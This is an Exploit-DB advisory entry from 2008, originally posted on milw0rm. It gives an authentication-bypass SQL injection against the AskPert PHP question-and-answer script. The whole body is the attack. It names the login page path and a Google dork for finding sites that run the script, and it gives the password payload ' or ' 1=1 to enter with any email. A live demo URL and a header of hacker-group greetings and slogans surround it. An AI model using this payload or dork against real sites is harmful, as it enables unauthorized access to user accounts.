AskPert Auth bypass Remote SQL Injection Vulnerability

2008-11-19T00:00:00
ID EDB-ID:7166
Type exploitdb
Reporter TR-ShaRk
Modified 2008-11-19T00:00:00

Description

AskPert (Auth bypass) Remote SQL Injection Vulnerability. CVE-2008-6309,CVE-2008-6310. Webapps exploit for php platform

                                        
                                            ##################WwW.TR-ShaRk.Co.cC###################
#AskPert  (Auth bypass) SQL Injection Vulnerability
##################WwW.TR-ShaRk.Co.cC###################

 ##################WwW.TR-ShaRk.Co.cC###################
 #[~] Author :  TR-ShaRk
 #[~] Msn : Starhack@tr-shark.org
 #[~] Web : WwW.TR-ShaRk.Co.cC
 #[~] I am Not Hacker
 #[~] Greetz :FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER
 #[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri
 #
 #[!] Script: http://www.w3matter.com/products/askpert
 #[!] Google_Dork:  Powered by AskPert
 ##################WwW.TR-ShaRk.Co.cC###################


 Go to ask/index.php?section=user&action=login

 Use following information to bypass login.

 Write any email Address as email address.It must to be in email format.

 For exapmple Starhack@TR-ShaRk.OrG

 For password use ' or ' 1=1


 #[~] LiveDemo:
 http://www.w3matter.com/ask/index.php?section=user&action=login

 ##################WwW.TR-ShaRk.Co.cC###################
 Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik | Ya Ezersin Yada Ezilirsin!
 ##################WwW.TR-ShaRk.Co.cC###################

# milw0rm.com [2008-11-19]